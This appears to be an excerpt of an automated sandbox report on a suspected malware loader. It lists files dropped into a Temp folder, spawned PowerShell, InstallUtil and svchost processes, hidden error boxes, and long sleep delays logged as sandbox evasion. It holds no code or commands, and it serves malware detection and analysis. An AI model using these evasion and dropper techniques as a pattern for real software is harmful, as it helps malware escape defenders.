                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\pack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssvagent.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunec.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\wsdetect.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmid.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cplJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\net.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\zip.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,12_2_00007FF7600A1684
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\README.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txtJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\Root
                    Source: C:\Users\user\Desktop\Loader.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\wmplayer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 506B83A
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: A70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 26A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeMemory allocated: 2410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 16E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 3240000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMemory allocated: 5240000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6622
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2721
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pcsc.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\w2k_lsa_auth.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\mlib_image.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\instrument.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\CampaignHardwareLauncher\uninst.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\npjp2.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\servertool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_sw.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\resource.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\policytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxmedia.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\pack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssvagent.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jabswitch.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\klist.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaws.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\npt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunec.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jpeg.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\lcms.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jawt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java_crw_demo.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsoundds.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcp120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfxwebkit.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jfr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ktab.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jaas_nt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jjs.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\keytool.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsdt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\j2pkcs11.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\nio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr120.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\wsdetect.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmid.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\unpack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscB629.tmp\NAct.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.cplJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javacpl.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\gstreamer-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\verify.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\ssv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\tnameserv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\java-rmi.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\net.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscB629.tmp\UAC.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_d3d.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jsound.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glib-lite.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jdwp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\orbd.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\zip.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2iexp.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_font_t2k.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javafx_iio.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\jp2native.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\hprof.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\sunmscapi.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\kinit.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\splashscreen.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\management.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-2442
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 6622 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 2721 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 6716Thread sleep count: 44 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe TID: 6716Thread sleep time: -43956s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe TID: 6308Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
